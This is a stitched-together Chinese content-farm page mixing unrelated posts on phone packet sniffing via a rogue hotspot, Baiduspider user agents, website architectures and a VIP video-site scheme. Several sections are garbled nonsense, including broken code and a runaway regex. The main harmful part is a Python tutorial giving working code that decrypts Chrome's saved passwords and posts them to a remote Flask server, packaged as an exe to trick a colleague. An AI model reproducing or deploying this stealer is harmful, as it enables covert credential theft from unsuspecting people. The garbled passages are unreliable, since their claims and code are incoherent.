汇总:利用无线路由器如何抓取手机网络数据包【详细介绍】
　　当用户使用手机上网时，手机会不断的接收和发送数据包，而这些数据包中收录了大量的用户信息，包括各种账号信息、聊天信息、收发文件、电子邮件和浏览网页。等待。虽然很多信息都是经过加密传输的，但是还是有很多信息是明文传输或者分析后可以解密的，比如账号信息、文件、邮件，还有一些聊天信息。这些数据包将通过路由器分发。我们只需要捕获和分析路由器即可提取用户的各种信息，无需在用户手机中安装和使用插件
　　二、环境建设
　　使用桥接模式在有无线网卡的电脑上搭建路由器，也可以使用360免费wifi提供热点，这样就可以截取连接到的手机发送的网络数据包无线 WiFi。
　　三、如何使用无线路由器抓取手机网络数据包
　　市场上有许多数据包捕获工具。例如，Wireshark 是比较成熟的之一。除了抓包外，它还附带了一些简单的分析工具。这些抓包工具的原理是通过winpcap提供的强大的编程接口来实现的。下面以Wireshark为例，讲解如何抓取网络数据包。
　　首先打开软件配置，网络抓包所需的参数，如图1所示。如果你熟悉协议，可以选择一个过滤器来过滤掉你不关心的数据包便于分析。比如我们知道微信朋友圈是TCP协议，端口号是443和80，我们可以根据这个信息选择对应的过滤器，然后选择要抓的网卡，开始抓网络包。
　　
　　四、网络数据包分析
　　在抓包时，Wireshark分为三个部分展示抓包结果，如图2所示。第一个窗口显示捕获的数据包列表，中间的窗口显示当前选中的数据包的简单解析内容，底部窗口显示当前选择的数据包的十六进制值。
　　以微信的一个协议包为例，通过抓包操作，抓取到用户通过手机发送的信息的完整对话包。根据对话包显示手机（ip为172.19.90.2，端口号51005)连接服务器（ id 为 172.2, 端口号 51005)) 121.51.130.113, 端口号 80) 传输数据到彼此。
　　前三个包是手机和服务器发送的确认对方身份的包（TCP三次握手），没有重要信息，主要看第四个包，如图4. 其中：
　　Frame：物理层的数据帧概览；
　　Ethernet II：数据链路层以太网帧头信息，包括发送方和目的MAC地址信息；
　　
　　Internet 协议版本 4：Internet 层 IP 数据包头信息；
　　传输控制协议：传输层数据段的头信息，这里是TCP协议；
　　超文本传输​​协议：使用层的信息，这里是HTTP协议；
　　媒体类型：要传输的具体数据；
　　这里主要分析使用层和数据层的内容，如图5所示，可以看出服务器域名为，信息提交地址为/mmtls/04a2f532，数据层数据长度为834字节，十六进制面板中的蓝色区域是发送的数据，但是数据内容是经过复杂加密的。 ，暂时不可用。
　　这样我们也可以分析发送的图片、视频等信息，后续的提取工作可以交给代码来实现。
　　解密:【百度网站抓取】如何正确识别Baiduspider移动ua
　　百度站长平台发布公告，宣布推出新版百度蜘蛛手机UA，同时公布了PC版百度蜘蛛UA，那么如何正确识别手机UA呢？我们的百度站长平台技术专家孙权给出了答案：
　　新的移动 UA：
　　Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) 版本/5.1 Mobile Safari/10600.6.3（兼容；Baiduspider/2.0；+/search/spider.html）
　　
　　PC UA：
　　Mozilla/5.0（兼容；Baiduspider/2.0；+/search/spider.html）
　　之前被“+/search/spider.html”识别网站注意！您需要修改识别方法。新的正确识别百度蜘蛛移动ua的方法如下：
　　
　　1.通过关键词“Android”或“Mobile”识别，判断为移动访问还是爬取。
　　2.通过关键词“Baiduspider/2.0”判断为百度爬虫。
　　另外需要强调的是，对于被封禁的机器人，如果被封禁的代理是Baiduspider，它将在PC端和移动端都生效。即无论是PC还是手机百度蜘蛛，都不会抓取被禁对象。之所以要强调这一点，是因为我发现有些代码是适配网站的（同样的url，打开PC ua时是PC页面，打开mobile ua时是手机页面）。以抓取为目的，但由于PC端和移动端百度蜘蛛代理都是百度蜘蛛，所以这种方法非常不可取。 查看全部

　　网页抓取解密出现的问题-无路由访问网站解密解密
　　网页抓取解密出现的问题都是由于爬虫程序或者爬虫服务器的问题。这里没有“无路由访问”。实际上只要你的爬虫爬的足够快，访问的网站足够多，那么包含你爬虫访问的网站就会很多很多。无路由只是表象，真正的原因是你的程序被抓取的内容本身出现在了爬虫服务器中。你所要做的就是修改自己的程序，让它的爬虫抓取内容更有效率。否则，无路由跟你做什么都没有一毛钱关系。
　　
　　从新编译成x。y。zxxxxxx。z另外把radius改成radius来爬pragmasecurity(localtimeenum{localtimedate})publicstaticvoidmain(string[]args){privatestringprompt='';privatestringlocaltime=prompt;privatestringrestory='';privatestringencrypt='';publicvoidstart(){synchronized(localtime){if(encrypt&&!encrypt){return;}else{localtime++;prompt=localtime;}localtime--;localtime--;localtime--;}system。
　　
　　out。println(prompt+'\n'+localtime+'\n'+restory+'\n'+encrypt);}}}。
　　可能存在一种情况：iocityparking那种情况（你站点验证算法来防止恶意爬取）。一些恶意代码会在你访问或爬取图片的时候把你的图片抓到postmessage里，然后爬虫再爬出去。所以iocityparking不是无路由，是自动算法先过滤掉恶意图片iocityparkingexamples从最简单的来说，反爬机制一般是对iocityparking的过滤，所以你如果网页里没什么一些xposed等web框架中处理的iocityparking,那其实反爬比较困难。 查看全部

　　web服务端代理支持反序列化的网页抓取解密
　　网页抓取解密cookie来获取当前网页的登录权限，生成新账号。然后你的手机登录获取对方微信账号，然后登录微信公众号，再解密就能获取所有的手机号。当然，加油方式就是破解微信防破解机制，或者你本人就是微信公众号运营者的话，别人就算植入木马病毒你也没有办法监控到手机号并知道实时的监控体系，也就不存在你设置白名单什么的了。
　　
　　然后基本上你已经入侵对方的手机登录机制，所以基本不可能拦截你的使用。——作为运营者或者守法者，你要做的就是装systemserver，你一旦登录，你的服务器的本地http服务器就要采取一系列措施防止你注册新的站点，然后就可以拦截了。至于如何装，是可以用类似于curl这样的网页转发的，可以参考googleapiapiforhttpresponses，或者，你可以把对方手机里面装好的app，记在rom里面，那样target-processor就会起来，就可以拦截对方手机的程序并获取这个程序的网页登录信息。
　　
　　更新：貌似没必要用服务器啦，通过某种方式dns解析上target-processor即可。开发者我推荐使用flash。有其他web服务无法抓取，除非他是内网ip。但可以通过加壳的方式修改掉flash的签名防止被cookie包了。另外如果你动机比较纯良那直接flash干掉对方就是啦。web服务端不可能也不需要定制防火墙之类，因为多数防火墙只做安全。
　　内网ip的话你架个tcp代理吧。这是不是蛮懒不过如果我是开发者，我多半会用flash。其他服务可以用api。web服务端代理只支持php+mysql，api支持http(/),post和https(:)。web服务端代理还支持反序列化。这算是基本上丧心病狂的防御吧。 查看全部

　　archiver,能够无限放大网页的宽度，但是不影响用户的输入框
　　网页抓取解密这种技术永远不过时！用好它，我们就能做无限的操作，改变我们的命运。今天给大家分享的是archiver,能够无限放大网页的宽度，但是放大以后不影响用户的输入框。archiver是一款强大的网页数据获取工具，通过archiver可以网页抓取和解密，它是一款免费的web开发工具。这款工具有一个非常强大的优点，它的原理很简单，就是在使用者操作鼠标操作浏览器，进行网页抓取、解密。
　　
　　在后面我将给大家详细讲解archiver的原理。首先我来给大家介绍一下archiver这款工具的下载：下载archiver，需要通过网址archiver.app更新。下载后解压，我们就能看到archiver这款工具了，接下来我就给大家介绍一下。archiver.app的安装图：安装过程中，点击next即可安装，没有问题。
　　安装好archiver.app之后，我们打开archiver.app，这款工具和普通的工具一样，都是支持关键词的搜索，我们输入网址的关键词就能搜索到所需要的网页。但是，如果输入的关键词是“西瓜子”，就不能够在网页中找到西瓜子字样的图片。我们将其重命名，改为“西瓜子天气”即可找到了，如图：接下来就是使用archiverapi了，我们只需要打开浏览器，通过chrome或者firefox等任意的浏览器，在地址栏中输入网址，或者直接复制链接，复制到浏览器进行打开即可。
　　
　　出现了这种问题，是因为当网址被切割成网页文件时，就没有办法找到网页了。这种情况下就要去看第三方代理了，推荐三方代理：谷歌代理，百度代理，http代理，https代理，就是上图中的那个。使用这款工具只需要有一台设备就可以随时随地登录了，不用再去考虑ip了。好了，现在给大家讲解一下如何用archiver进行解密，我这里用电脑进行举例。
　　第一步是打开archiver，添加网址地址。输入网址，然后点击tabledownload，然后选择要进行解密的网址，在解密之前一定要在浏览器中打开以网址进行解密。解密成功后就能在archiver中看到我们需要的网页了。网页中出现的字符一定要打上码。修改扩展的相关选项，就是选择一下下面的三个编码，text-to-string,text-to-code,text-to-ascii,其中text-to-code表示转换为数字表示数字，text-to-ascii表示转换为字符表示数字，这个我们后面讲解。
　　回车以后，解密成功了。接下来我们就开始编程吧，点击assets，在assets我们找到字典，点击下面的addlibrary，将刚才在archiver.app中添加的字典添加到assets中，效果图如下：编程简单说就是添加字典字符串，编程步骤如下：首先点击archiverapi中的键盘上的那个。 查看全部

　　网页抓取解密技术说的通俗易懂一点就是
　　网页抓取解密技术说的通俗易懂一点就是：找到网站各页面的form_token然后把这个值传给后台
　　要实现这种功能，就必须要使用到requests库提供的一个接口method方法，作用就是判断请求的正确格式如果请求的请求是一个https请求的话，那么就会提示你网页代码错误，
　　
　　以上回答简直low得不能再low。你可以看看这个：reversepageentrieswithformdata。
　　安全性和流量有关,requests就没有流量限制.
　　安全性太差，
　　
　　首先，requests不是爬虫工具。不过既然可以用来爬虫，
　　requests库中并没有解密函数，需要一些方法。推荐的方法：beautifulsoup、xpath、re、md5、json.parse。
　　技术上没问题，requests本身就提供了很强大的方法，用途可以是爬虫的判断，一些工具提供的效率也挺高的。问题是自己写的话，可以看看requests的开发者博客里面有一些相关实现。
　　1.javascript在请求时，有一个参数是authorizationform（用户验证信息），无论用requests,postman,tinyhttpd...一律设为cookie,就可以获取了。（当然了，这样玩太麻烦了）2.requests的实现不是跟踪请求的，而是存在于数据库的。requests.post(xxx,id=1,headers={"id":xxx})可以看到，请求的method是post（你对xxx解密，用thrift也是可以的）3.requests.post(xxx,json)等价于json.parse()。 查看全部

　　网页抓取解密概念大透明之前在shell的黑盒渗透分析
　　
　　网页抓取解密概念大透明之前在shell的黑盒渗透分析中介绍过如何利用https绕过脚本，并获取用户的浏览数据。人们可以采用封的方式来获取这个数据，那么，如何把https登录的用户数据也当成攻击对象，进行网页抓取呢？另外我个人感觉爬虫代码真的是太长了，所以没有去使用python，而是用了c编写，所以导致了代码是lua，虽然我知道也能绕过，但是你的技术相当牛逼的话，直接可以绕过吧。
　　
　　首先进行抓取：#!/usr/bin/envpython#-*-coding:utf-8-*-importsysimportrequestsimporturllib2importtimefromhttpimporthttpshttp=https.get("")#抓取自动登录的qq邮箱的登录后的数据（一份半）http=http.post("")http=http.delete("")#取消自动登录connect=urllib2.request(url,headers=headers)sess=urllib2.urlopen("")#解析网页的内容获取到请求头信息http.write(sess.read().decode("gbk"))#把sess.read().decode("gbk")转换成gbk字符串信息。
　　response=urllib2.urlopen("").read().decode("gbk")#printresponsehttp.reload(sys)#sys.setdefaultencoding("utf-8")#获取请求报文headers={"user-agent":"mozilla/5.0(windowsnt6.1;wow64)applewebkit/537.36(khtml,likegecko)chrome/31.0.2970.90safari/537.36"}headers={"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/web-image;q=0.8,*/*;q=0.8","accept-encoding":"gzip,deflate","accept-language":"zh-cn,zh;q=0.8","cookie":"referer=/"}s=sess.post(url,headers=headers)data={'qq.qqmail.qqmail.qq.qqmail':'','qq.qqmail.qq.qq.qq.qq':'','qq.qqmail.qq.qq.qq.qq':'','qq.qqmail.qq.qq.qq.qq.qq':'','qq.qqmail.qq.qq.qq.qq.qq':'','qq.qqmail.qq.qq.qq.qq.qq.qq':'','qq.qqmail.qq.qq.qq.qq.qq.qq':'','qq.。 查看全部

　　最新揭秘：facebook网站架构图
　　WikiPedia 技术架构图Copy @Mark Bergsma
　　来自wikipedia的数据：峰值每秒钟3万个 HTTP 请求 每秒钟 3Gbit 流量, 近乎375MB350 台 PC 服务器。GeoDNSA ：40-line patch for BIND to add geographical filters support to the existent views in BIND", 把用户带到最近的服务器。GeoDNS 在 WikiPedia 架构中担当重任当然是由 WikiPedia 的内容性质决定的--面向各个国家，各个地域。负载均衡：LVS，请看下图：
　　Facebook 搜索功能的架构示意图
　　细心的读者一定能发现，上副架构图之前出现在此文之中：从几幅架构图中偷得半点海里数据处理经验。本文与前文最大的不同是，前文只有几幅，此文系列将有上百幅架构图，任您尽情观赏。
　　Yahoo! Mail 架构
　　Yahoo! Mail 架构部署了 Oracle RAC，用来存储 Mail 服务相关的 Meta 数据。
　　twitter的整体架构设计图
　　twitter平台大致由、手机以及第三方应用构成，如下图所示（其中流量主要以手机和第三方为主要来源）：
　　缓存在大型web项目中起到了举足轻重的作用，毕竟数据越靠近CPU存取速度越快。下图是twitter的缓存架构图：
　　
　　关于缓存系统，还可以看看下幅图：
　　GAE的架构图
　　简单而言，上述GAE的架构分为如图所示的三个部分：前端，Datastore和服务群。前端包括4个模块：Front End，Static Files，App Server，App Master。Datastore是基于BigTable技术的分布式数据库，虽然其也可以被理解成为一个服务，但是由于其是整个App Engine唯一存储持久化数据的地方，所以其是App Engine中一个非常核心的模块。其具体细节将在下篇和大家讨论。整个服务群包括很多服务供App Server调用，比如Memcache，图形，用户，URL抓取和任务队列等。
　　Amazon的Dynamo Key-Value存储架构图
　　可能有读者并不熟悉Amazon，它现在已经是全球商品品种最多的网上零售商和全球第2大互联网公司。而之前它仅仅是一个小小的网上书店。ok，下面，咱们来见识下它的架构。Dynamo是亚马逊的key-value模式的存储平台，可用性和扩展性都很好，性能也不错：读写访问中99.9%的响应时间都在300ms内。按分布式系统常用的哈希算法切分数据，分放在不同的node上。Read操作时，也是根据key的哈希值寻找对应的node。Dynamo使用了 Consistent Hashing算法，node对应的不再是一个确定的hash值，而是一个hash值范围，key的hash值落在这个范围内，则顺时针沿ring找，碰到的第一个node即为所需。Dynamo对Consistent Hashing算法的改进在于：它放在环上作为一个node的是一组机器（而不是memcached把一台机器作为node），这一组机器是通过同步机制保证数据一致的。下图是分布式存储系统的示意图，读者可观摩之：
　　Amazon的云架构图如下：
　　Amazon的云架构图
　　从一开始，优酷网就自建了一套CMS来解决前端的页面显示，各个模块之间分离得比较恰当，前端可扩展性很好，UI的分离，让开发与维护变得十分简单和灵活，下图是优酷前端的模块调用关系：
　　这样，就根据module、method及params来确定调用相对独立的模块，显得非常简洁。下图是优酷的前端局部架构图：
　　优酷的数据库架构也是经历了许多波折，从一开始的单台MySQL服务器（Just Running）到简单的MySQL主从复制、SSD优化、垂直分库、水平sharding分库。
　　1.简单的MySQL主从复制。
　　
　　MySQL的主从复制解决了数据库的读写分离，并很好的提升了读的性能，其原来图如下：
　　其主从复制的过程如下图所示：
　　但是，主从复制也带来其他一系列性能瓶颈问题：
　　写入无法扩展写入无法缓存复制延时锁表率上升表变大，缓存率下降那问题产生总得解决的，这就产生下面的优化方案。2. MySQL垂直分区如果把业务切割得足够独立，那把不同业务的数据放到不同的数据库服务器将是一个不错的方案，而且万一其中一个业务崩溃了也不会影响其他业务的正常进行，并且也起到了负载分流的作用，大大提升了数据库的吞吐能力。经过垂直分区后的数据库架构图如下：
　　然而，尽管业务之间已经足够独立了，但是有些业务之间或多或少总会有点联系，如用户，基本上都会和每个业务相关联，况且这种分区方式，也不能解决单张表数据量暴涨的问题，因此为何不试试水平sharding呢？
　　3. MySQL水平分片（Sharding）这是一个非常好的思路，将用户按一定规则（按id哈希）分组，并把该组用户的数据存储到一个数据库分片中，即一个sharding，这样随着用户数量的增加，只要简单地配置一台服务器即可，原理图如下：
　　如何来确定某个用户所在的shard呢，可以建一张用户和shard对应的数据表，每次请求先从这张表找用户的shard id，再从对应shard中查询相关数据，如下图所示：
　　是如何解决跨shard的查询呢，这个是个难点，据介绍优酷是尽量不跨shard查询，实在不行通过多维分片索引、分布式搜索引擎，下策是分布式数据库查询（这个非常麻烦而且耗性能）。缓存策略
　　貌似大的系统都对“缓存”情有独钟，从http缓存到memcached内存数据缓存，但优酷表示没有用内存缓存，理由如下：
　　避免内存拷贝，避免内存锁
　　如接到老大哥通知要把某个视频撤下来，如果在缓存里是比较麻烦的
　　而且Squid 的 write() 用户进程空间有消耗，Lighttpd 1.5 的 AIO(异步I/O) 读取文件到用户内存导致效率也比较低下。
　　但为何我们访问优酷会如此流畅，与土豆相比优酷的视频加载速度略胜一筹？这个要归功于优酷建立的比较完善的内容分发网络（CDN），它通过多种方式保证分布在全国各地的用户进行就近访问——用户点击视频请求后，优酷网将根据用户所处地区位置，将离用户最近、服务状况最好的视频服务器地址传送给用户，从而保证用户可以得到快速的视频体验。这就是CDN带来的优势，就近访问。 查看全部

　　用 Python 破解朋友的网站密码
　　
　　如何破解iphone登陆密码
　　今天看了一篇关于如何破解iphone手机密码的文章，瞬间觉得科学技术不是第一生产力，why？
　　
　　根据“可靠消息”称，即便美国FBI也无法轻易的对iphone手机进行暴力破解，当然美国有一家黑客公司可针对iphone进行破解，单收费过万美金。
　　那么铺天盖地的iphone手机密码破解“黑客”是怎么做的？
　　无非是骗，他们假装成各类官方人员告诉你发现你的iphone手机存在异常，需要远程告知apple_id帮你追回手机，呵呵….
　　可是，这个梗和今天的文章有什么关系呢？
　　黑客的自我修养
　　
　　随着Python的活跃，各大平台都在鼓吹，甚至已经出了关于python黑客入门的书籍。
　　也许做一个黑客难如登天，那不如我们换个思路，去假装做一个伪黑客如何？
　　前几天看帖子，发现我们使用浏览器的时候，当登陆一个需要输入用户名密码的网站时，在你登陆成功后，系统会提示你是否保存密码，如果点击确认，浏览器将会把我们本次输入的密码，存储在浏览器中，待下次登录时便可以免密登录。
　　那么，这些密码是怎么保存的，又存储在哪里呢？
　　Chrome浏览器
　　也许很多人会说，360浏览器、QQ浏览器，这些国产的加壳浏览器不论美观还是所谓的安全方面都做的很符合国人需求。但如果你的工作与IT挂钩，无疑Chrome将是很多朋友的首选。当然这篇文章不是介绍Chrome浏览器的使用手册，今天我们主要来看看Chrome浏览器的密码存储机制。
　　查看Chrome存储的密码表单
　　点击你们的Chrome浏览器右上角，进入设置->高级->管理密码(根据浏览器版本不同，可能存在部分差异)，亦或者在Chrome浏览器中输入chrome://settings/passwords。你会看到很多已保存过的密码表单信息，当然如果你要查看密码详情，就要输入电脑的系统管理员密码。
　　那么，Chrome的密码是以什么方式进行存储的呢？SQLite…
　　很多嵌入式产品中，都会使用SQLite数据库进行数据存储，它占用资源低，数据库即文件，又支持sql语法的增删改查，简直不要太方便
　　SQLite在哪，又该怎么查询？
　　首先，进入我的电脑，地址栏中输入%LOCALAPPDATA%,进入app的数据存储路径：
　　C:\Users\Administrator\AppData\Local
　　之后进入chrome浏览器的密码数据库统一地址为：
　　Google\Chrome\User Data\Default\Login Data
　　查看Chrome浏览器存储的密码
　　既然拿到了SQLite数据库文件，我们随便找个sqlite工具，就能打开这个数据库了！
　　这里我使用sqlitestudio：
　　数据库信息展示.png
　　打开数据库，我们看到有三张表：
　　logins 、meta、 stats
　　其中logins中就存储这你保存的网址、用户名、密码数据，分别是:
　　signon_realm,username_value,password_value
　　但问题来了，password_value的字段看着是空的啊？因为加密了！
　　如何解密？网上查了下：
　　CryptUnprotectData数据可以在win32crypt中找到，要使用该模块，需要进行安装：
　　pip install pywin32
　　万事俱备，就差撸代码了！
　　代码实现
　　 1import os<br /> 2import shutil<br /> 3import sqlite3<br /> 4import win32crypt<br /> 5<br /> 6db_file_path = os.path.join(os.environ['LOCALAPPDATA'], r'Google\Chrome\User Data\Default\Login Data')<br /> 7<br /> 8tmp_file = os.path.join(os.environ['LOCALAPPDATA'], 'sqlite_file')<br /> 9print(tmp_file)<br />10if os.path.exists(tmp_file):<br />11    os.remove(tmp_file)<br />12shutil.copyfile(db_file_path, tmp_file)<br />13<br />14conn = sqlite3.connect(tmp_file)<br />15for row in conn.execute('select signon_realm,username_value,password_value from logins'):<br />16    ret = win32crypt.CryptUnprotectData(row[2], None, None, N one, 0)<br />17    print('网站：%-50s，用户名：%-20s，密码：%s' % (row[0][:50], row[1], ret[1].decode('gbk')))<br />18<br />19conn.close()<br />20os.remove(tmp_file)<br />
　　通过解密，我们获取到了Chrome浏览器保存的用户名密码，然后保存至文本。
　　获取到的本地密码.png
　　之后我们只需要使用pyinstaller -F xxx.py,将代码打包成exe发给同事，就可以在他的电脑上获取密码了！
　　但，如果咱们的黑客之旅到此为止，那这个伪黑客未免有点low了吧？
　　数据回传
　　为什么说要打包成exe？一是可以脱离环境单独执行，二却是为了加壳！
　　我们在原有的代码基础上，添加如下内容
　　1import requests<br />2try: # 记得添加try except 不然万一你忘记启动Flask程序，岂不是让同事发现了<br />3    requests.post('http://192.168.1.101:9999/index',<br />4                  data=''.join(passwordList).encode('utf-8'))<br />5except:<br />6    pass<br />
　　最后整理我们的代码：
　　 1# -*- coding: utf-8 -*-<br /> 2# @Author  : 王翔<br /> 3# @JianShu : 清风Python<br /> 4# @Date    : 2019/5/18 22:53<br /> 5# Software : PyCharm<br /> 6# version：Python 3.6.8<br /> 7# @File    : ChromePassword.py<br /> 8<br /> 9import os<br />10import shutil<br />11import sqlite3<br />12import win32crypt<br />13import json<br />14import requests<br />15<br />16APP_DATA_PATH = os.environ["LOCALAPPDATA"]<br />17DB_PATH = r'Google\Chrome\User Data\Default\Login Data'<br />18<br />19<br />20class ChromePassword:<br />21<br />22    def __init__(self):<br />23        self.passwordsList = []<br />24<br />25    def get_chrome_db(self):<br />26        _full_path = os.path.join(APP_DATA_PATH, DB_PATH)<br />27        _tmp_file = os.path.join(os.environ['LOCALAPPDATA'], 'sqlite_file')<br />28        if os.path.exists(_tmp_file):<br />29            os.remove(_tmp_file)<br />30        shutil.copyfile(_full_path, _tmp_file)<br />31        self.show_passwords(_tmp_file)<br />32<br />33    def show_passwords(self, db_file):<br />34        conn = sqlite3.connect(db_file)<br />35        _sql = '''select signon_realm,username_value,password_value from logins'''<br />36        for row in conn.execute(_sql):<br />37            ret = win32crypt.CryptUnprotectData(row[2], None, None, None, 0)<br />38            # 密码解析后得到的是字节码，需要进行解码操作<br />39            _info = 'url: %-40s username: %-20s password: %s\n' % \<br />40                    (row[0][:50], row[1], ret[1].decode())<br />41            self.passwordsList.append(_info)<br />42        conn.close()<br />43        os.remove(db_file)<br />44<br />45    def save_passwords(self):<br />46        with open('password.txt', 'w', encoding='utf-8') as f:<br />47            f.writelines(self.passwordsList)<br />48<br />49    def transfer_passwords(self):<br />50        try:<br />51            # 此处填写远端Flask对应的IP:PORT<br />52            requests.post('http://192.168.1.102:9999/index',<br />53                          data=json.dumps(self.passwordsList))<br />54        except requests.exceptions.ConnectionError:<br />55            pass<br />56<br />57<br />58if __name__ == '__main__':<br />59    Main = ChromePassword()<br />60    Main.get_chrome_db()<br />61    Main.save_passwords()<br />62    Main.transfer_passwords()<br />
　　下来，我们在本地写一个最简单的Flask程序，用户获取回传的参数，代码如下：
　　 1# -*- coding: utf-8 -*-<br /> 2# @Author  : 王翔<br /> 3# @JianShu : 清风Python<br /> 4# @Date    : 2019/5/18 22:53<br /> 5# Software : PyCharm<br /> 6# version：Python 3.6.8<br /> 7# @File    : ChromePassword.py<br /> 8<br /> 9from flask import Flask, request<br />10import time<br />11import json<br />12<br />13app = Flask(__name__)<br />14<br />15<br />16@app.route('/index', methods=["GET", "POST"])<br />17def index():<br />18    if request.method == 'POST':<br />19        _txtName = '%s_%s.txt' % (request.remote_addr,<br />20                                  time.strftime('%Y%m%d%H%M%S', time.localtime()))<br />21        with open(_txtName, 'w', encoding='utf-8') as f:<br />22            f.writelines(json.loads(request.data))<br />23    return "小哥，里面玩儿啊"<br />24<br />25<br />26if __name__ == '__main__':<br />27    # 端口可自行设置<br />28    app.run(host='0.0.0.0', port=9999)<br />
　　打完收工，就差同事去点击你发给他的exe了。他以为你的工具仅仅把Chrome密码生成txt保存，
　　其实，在他点击工具的同时，你电脑会获取他传输的数据，并存储在一个ip时间戳的文本中！
　　Flask回传.png
　　然后，拿去给他们炫耀吧！ 查看全部

　　如何在正则表达式中找到正确的数字格式呢？(二)
　　网页抓取解密随着网络环境的发展，多人协作项目已经成为常见的操作。可在商业网站中，由于信息较多，加上人员流动性大，很多商业网站经常出现网页抓取失败，或者难以找到ssl/tls握手代码的情况。针对这些问题，可以使用将网页元素编码保存到一个txt文本文件，使用正则匹配来找到正确的编码格式。那么如何在正则表达式中找到正确的数字格式呢？这里就需要用到正则表达式、字符串处理等知识，通过相应的函数去完成。
　　01正则表达式正则表达式是一种特殊的字符，和python中的str等形式不同。它不是用于匹配任何文本的，而是一种用于从包含某种语言的字符序列中搜索特定文本的编程语言。那么正则表达式该如何看到对应的正则表达式呢？/\d+(0-9,)用于匹配数字\d+\b+(0-9,)匹配一个字符\b+\b+\d+\b+\d+\d+\d+\d+\d+\d+正则表达式中的\d会匹配以d开头的所有字符/\d\d\d\d\d\d\d\d\d\d\d\d\d\d\d\d\d+\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b。 查看全部

　　解密VIP视频网站的玩法，以及可以盈利的方法！
　　这里再说几点注意事项：
　　建站需要：备案域名一个，web服务器或者虚拟主机一个 ，再加网站源码上传架设才算完成。
　　备案的域名：这个是可以购买已经阿里云备案好的域名，很多人在购买使用，销量评论总体还不错：（必须要强调一点，这不是广告，仅提供参考，各位看官随意就好）。
　　注意，购买之前一定要检测是否有备案、以及是否被微信拦截。最好购买的是在阿里云备案的域名，因为后面会用到阿里云的虚拟主机。
　　云虚拟主机：现在阿里搞活动仅需6元就能买到一个，附上链接：（还是那句，这里的一切推荐都非广告，只是个人觉得使用的好推荐给大家的，至于要不要使用，随意就好）。
　　
　　操作步骤：
　　源码拿到手里是个压缩包，解压就这么些文件，红色小箭头的文件名：index.php这个文件里面就是网站页面源码，修改网站名字，或者导购网站的超链接，其他文件可以不用修改，什么的都在里面修改。
　　修改的话可以用：Notepad，UE等工具修改（如果你有更好的工具，也可以留言给周泽），还可以用记事本打开的方式去修改，但是不推荐，很容易修改成乱码，造成网站主页打不开，或者乱码，你一定要使用记事本修改，最好备份一下。
　　
　　修改好了就可以把源码上传到虚拟主机使用啦。
　　如何上传网站程序：
　　阿里云已经有非常详细的教程我就不写出来了。
　　需要注意一点：购买虚拟主机时必须选择linux系统的，不要问我为什么。
　　域名解析：
　　【进入高级设置】，点击【添加解析】，选择记录类型为A记录；主机记录为空，或填写www；记录值填写您之前获取的主机IP地址；解析线路，TTL默认即可。
　　点击保存，即可完成域名解析设置。
　　
　　解析完之后再到虚拟主机管理面板去绑定一下域名即可访问使用。
　　下面再给大家分享的视频VIP解析。
　　尤其是女性对这个的需求市场很大，不少同学也测试过还是很有效果的。很案例可以举一反三拿来用，种类很多数不过来，只要去执行，总是会有不少收获的。
　　比如说这2小箭头都可以对应使用超级链接，引流到你指定导购网站，或者空间，或者搞活码微信群，QQ群等等，方法很多都要自己去尝试，你有适合自己的方法也可以对应修改。
　　好了，今天分享的是其中一个思路VIP视频不仅仅可以拿来引流，也有像做电影网站骗下载赚佣金这样的网赚老套路。
　　思路已经给了，具体操作要靠自己去执行，执行真心很重要！你说对吗？
　　—— 不可错过的干货 —— 查看全部

　　SEO实战干货：独家揭秘内页快速收录排名
　　在众多的SEO理念当中，或多或少的每一位SEO从业人员都有遇到一些优化中比较纠结的问题，而众多纠结的问题当中，收录一词是很多SEO人员提到比较频繁的词汇。今天我们不讲外链，也不讲内链，我们讲收录与排名，老样子，继续用案例给大家展示案例效果，如下图所示：
　　
　　该站上线是2016年11月中旬，到文章截稿时间大约一周左右，从整体站点页面的收录速度以及排名中可以看得出，蜘蛛的抓取频率是非常快的。在给大家揭秘内页实战快速收录并且做到页面参与排名的方法以前，我必须的告诉大家两个点。
　　第一、该站点所有文章均为抄袭，任意一篇文章的内容
　　百度上都出现了多次，打破了传统原创思维理念。
　　第二、这仅仅是一个刚上线的新站，并且没有使用任何所谓的蜘蛛池进行吸引蜘蛛。
　　那么就会有很多朋友会问，新站是如何做到快速收录并且可以建立部分页面参与排名的，这个话题是本文的研究核心。首先我不得不说一句，如果大家也遇到了收录问题，那么至少有一点你没有做好，那就是你一直在关于所谓的外链、内链、布局、原创内容。忘记了一个核心的点，就是搜索引擎排名原理。
　　首先要想做好页面收录并且参与排名，我们要先思考下搜索引擎工作原理，当然，别小看这种最最基础的东西，你领悟了核心要点，那么操作收录起来就会变得游刃有余，如下图所示：
　　
　　通过百度百科的文档中我们可以看出，整个原理是从最初的爬行抓取>收录>建立索引>搜索词处理>排序，虽然才几个步骤，但是每个步骤都有他的核心要点。下面我将把整个核心要点给大家一一剖析。
　　一、爬行与抓取
